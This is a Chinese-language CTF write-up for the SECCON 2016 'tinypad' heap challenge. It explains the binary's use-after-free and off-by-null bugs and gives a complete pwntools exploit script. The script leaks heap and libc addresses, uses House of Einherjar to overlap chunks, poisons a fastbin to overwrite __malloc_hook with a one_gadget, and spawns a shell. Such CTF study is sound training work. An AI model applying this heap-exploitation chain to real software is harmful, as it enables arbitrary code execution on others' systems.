美文网首页
SECCON 2016 tinypad题目

SECCON 2016 tinypad题目

作者: Ovie | 来源:发表于2019-01-11 19:15 被阅读0次

文件:https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/house-of-einherjar/2016_seccon_tinypad

checksec下:

    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

程序操作

添加memo:    申请的大小范围:1 - 0x100
删除memo:    存在UAF
编辑memo:

使用read_until函数读取memo内容,该函数有off-by-null

程序数据存储:

tinypad+256起存储memos
每个memo是0x10字节:
    8字节:memo长度
    8字节:指向memo内容

pwn脚本

思路:通过off-by-null,利用House of Einherjar构造overlapping chunk,再覆盖fast chunk的fd指针,指向__malloc_hook附近,将__malloc_hook覆盖成one_gadget

tinypad_pwn.py:

# -*-coding:utf-8-*-
from pwn import *
import pdb

# context.log_level = "debug"

def add_memo(p, size, content):
    p.recvuntil("(CMD)>>>")
    p.sendline("A")
    p.recvuntil("(SIZE)>>>")
    p.sendline(str(size))
    p.recvuntil("(CONTENT)>>>")
    p.sendline(content)

def delete_memo(p, idx):
    p.recvuntil("(CMD)>>>")
    p.sendline("D")
    p.recvuntil("(INDEX)>>>")
    p.sendline(str(idx))

def edit_memo(p, idx, content):
    p.recvuntil("(CMD)>>>")
    p.sendline("E")
    p.recvuntil("(INDEX)>>>")
    p.sendline(str(idx))
    p.recvuntil("(CONTENT)>>>")
    p.sendline(content)
    p.recvuntil("(Y/n)>>>")
    p.sendline("Y")


p = process("./tinypad")

# 第一步: 利用UAF泄露heap地址和libc基址
add_memo(p, 0x60, "A" * 0x10) # fast chunk
add_memo(p, 0x60, "B" * 0x10) # fast chunk
add_memo(p, 0xf0, "C" * 0x10) # unsorted chunk
add_memo(p, 0x80, "D" * 0x10)

delete_memo(p, 3)
delete_memo(p, 2)
delete_memo(p, 1)

p.recvuntil("INDEX: 1")
p.recvuntil("CONTENT: ")
addr_heap = u64(p.recvuntil("\n", drop=True).ljust(8, "\x00"))
log.success("addr_heap: " + hex(addr_heap))

p.recvuntil("INDEX: 3")
p.recvuntil("CONTENT: ")
addr_unsorted_bin = u64(p.recvuntil("\n", drop=True).ljust(8, "\x00"))
log.success("addr_unsorted_bin: " + hex(addr_unsorted_bin))
addr_libc = addr_unsorted_bin - 0x3c4b78  # Fix You
log.success("addr_libc: " + hex(addr_libc))
addr_malloc_hook = addr_libc + 0x3C4B10  # Fix You
addr_fake_fastchunk = addr_malloc_hook - 0x23
one_gadget = addr_libc + 0xf1147  # 该one_gadget需满足[rsp+0x70] == NULL   # Fix You

# 第二步: 利用House Of Einherjar构造overlapping chunk
add_memo(p, 0xf0, "C" * 0x10)  # use unsorted chunk (index: 1)
add_memo(p, 0x60, p64(0) + p64(0xd0) + p64(addr_heap - 0x60) + p64(addr_heap - 0x60))  # fake chunk (index: 2)
add_memo(p, 0x68, "B" * 0x60 + p64(0xd0))  # off-by-one (index: 3, will be overlapping chunk)
'''此时堆从低地址到高地址的分布:  
fake chunk                  --   AAAA  ----  (index: 2)
用于执行off-by-one的chunk     --   BBBB  ----  (index: 3)
用于free的chunk              --   CCCC  ----  (index: 1)
靠top chunk的chunk           --   DDDD  ----  (index: 4)
'''

delete_memo(p, 1)  # free to consolidate backward
delete_memo(p, 3)  # add this overlapping chunk to fastbin

# 第三步: 覆盖fastbin上的chunk的fd指针,指向__malloc_hook附近区域
add_memo(p, 0x90, "E" * 0x50 + p64(0) + p64(0x71) + p64(addr_fake_fastchunk)) # (index: 1)

'''
因为最多只能有4个memo,这里需要删除一个,后面才能申请到两个memo
这里不能调delete_memo(p, 4), 因为要释放调这个靠top chunk的chunk,其会跟top chunk合并,下面的size变量会加上top chunk的大小,从而满足下面的条件
if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
  if (have_fastchunks(av))
malloc_consolidate(av);
...
}
就会调用到malloc_consolidate函数。而在这个函数里处理fastbin chunk时会调用到unlink,而unlink时会检查被unlink的chunk的size和prev_size,这个检查通不过。
'''
delete_memo(p, 1) 

add_memo(p, 0x60, "F" * 0x10) # (index: 1)
add_memo(p, 0x60, "X" * (addr_malloc_hook - addr_fake_fastchunk - 0x10) + p64(one_gadget)) # (index: 2)


# 第四步: 调用malloc, 触发one_gadget
delete_memo(p, 2)
p.recvuntil("(CMD)>>>")
p.sendline("A")
p.recvuntil("(SIZE)>>>")
p.sendline(str(0x10))


p.interactive()

运行上面的脚本前需根据自己的libc版本来修改几个硬编码值,脚本里用Fix You标注出。
附:这里有个思路是跟上面稍微有些不同

相关文章

  • SECCON 2016 tinypad题目

    文件:https://github.com/ctf-wiki/ctf-challenges/tree/master...

  • House Of Einherjar - 2016 Seccon

    1.程序分析全局变量tinypad 前0x100字节保存着edit操作时的一个缓冲区,edit时先将输入写入到这里...

  • SECCON -Vigenere3d

    题目如下: 首先题目生成一个三维数组的密码本,就好比谍战片的流密码本;加密的过程: (1):首先查找在s中的位置,...

  • 华为2016机试题目

    实现语言:C++ 题目简单,没有涉及太多的算法,就是一些输入输出的格式需要注意 题目一 描述根据指定的分隔符分隔...

  • 2019 Seccon PWN Writeup--sum

    0x20 sum 这道题目挺有意思的, 一开始没想明白怎么利用, 只知道一个Integer Overflow和of...

  • 周赛Problem  G (Connected Componen

    题目来源:来自2016 ACM-ICPC Dhaka站的题目(UVALive - 7638),难度是全场除了签到题...

  • SECCON Quals CTF 2015 Reverse-E

    Github Link 题目比较简单, 直接简单解释下不多说. Overview 不需要Overview,直接看代...

  • 2018-07-03

    ISC2016训练赛——phrackCTF 分值:50分类型:Basic题目名称:veryeasy已解答 题目内容...

  • 6.828 操作系统 Homework: Multithread

    题目介绍 https://pdos.csail.mit.edu/6.828/2016/homework/lock....

  • 2018-04-21 RE第二记

    夜深了,写完要赶紧睡了! 题目:ISC2016训练赛——phrackCTF 拿到这个题目,打开PEid看看是否加了...

网友评论

      本文标题:SECCON 2016 tinypad题目

      本文链接:https://www.haomeiwen.com/subject/bihfdqtx.html